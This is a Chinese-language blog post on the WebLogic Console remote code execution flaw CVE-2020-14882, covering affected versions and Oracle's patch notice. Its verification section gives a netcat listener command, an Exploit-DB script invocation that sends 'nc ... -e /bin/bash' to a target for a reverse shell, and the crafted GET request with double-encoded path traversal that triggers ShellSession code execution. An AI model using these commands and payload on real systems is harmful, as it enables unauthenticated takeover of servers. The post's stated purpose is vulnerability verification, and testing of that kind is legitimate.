WEBLOGIC CONSOLE HTTP 协议远程代码执行漏洞(CVE-2020-14882)

漏洞介绍

在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包含一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882。
该漏洞能够在无需身份验证的情况下被触发,影响面较大。
未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。
官方给出的CVSS 评分为 9.8。
Oracle官方CPU链接:
https://www.oracle.com/security-alerts/cpuoct2020.html

漏洞影响范围

  • Oracle Weblogic Server 10.3.6.0.0
  • Oracle Weblogic Server 12.1.3.0.0
  • Oracle Weblogic Server 12.2.1.3.0
  • Oracle Weblogic Server 12.2.1.4.0
  • Oracle Weblogic Server 14.1.1.0.0

验证漏洞

exploits来源:

https://www.exploit-db.com/exploits/48971

在攻击端开启4444端口监听

nc -lp 4444

然后使用exploit攻击weblogic

python  14882.py  http://x.x.x.x:xxxx "nc 攻击机地址  4444 -e /bin/bash"

这个时候就可以在上面的监听窗口,执行被攻击机的命令,权限为weblogic应用用户,目录为domain目录

这个exploits非常简单,主要就是构造一个HTTP GET
GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('" + command + "');");", verify=False, headers=headers)

你可能感兴趣的:(WEBLOGIC CONSOLE HTTP 协议远程代码执行漏洞(CVE-2020-14882))